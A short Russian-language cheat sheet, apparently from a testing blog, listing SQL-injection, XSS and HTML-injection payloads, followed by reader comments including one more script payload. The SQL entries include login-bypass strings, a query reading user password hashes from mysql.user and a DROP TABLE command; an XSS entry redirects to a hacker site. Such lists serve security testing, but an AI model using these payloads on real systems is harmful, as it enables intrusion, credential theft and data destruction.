SQL-инъекции | кавычка ' |
OR '1'='1' | |
' or '1'='1' -- ' | |
' or '1'='1' ({ ' | |
' or '1'='1' /* ' | |
12345) AND 1=1--:hash | |
SELECT user(); или SELECT system_user(); | |
SELECT host, user, password FROM mysql.user; | |
SELECT database() | |
DROP TABLE user; |
XSS | <script>alert("xss-injection!")</script> |
<script>document.getElementByID("...").disabled=true</script> | |
<script>window.parent.location.href='http://hacker_site';</script> | |
<img src=javascript:alert('xss-injection!')> | |
<input onclick="javascript:alert('xss-injection');"> | |
<b onmouseover="alert('xss-injection!')">Hello</b> |
HTML-инъекции | </body> |
<textarea /> | |
<input></input> | |
<form action="http://google.com"><input type="submit"></form> |
Полезно
ОтветитьУдалитьscript>alert(1);</script>
ОтветитьУдалитьполезно 04 06 2020
ОтветитьУдалить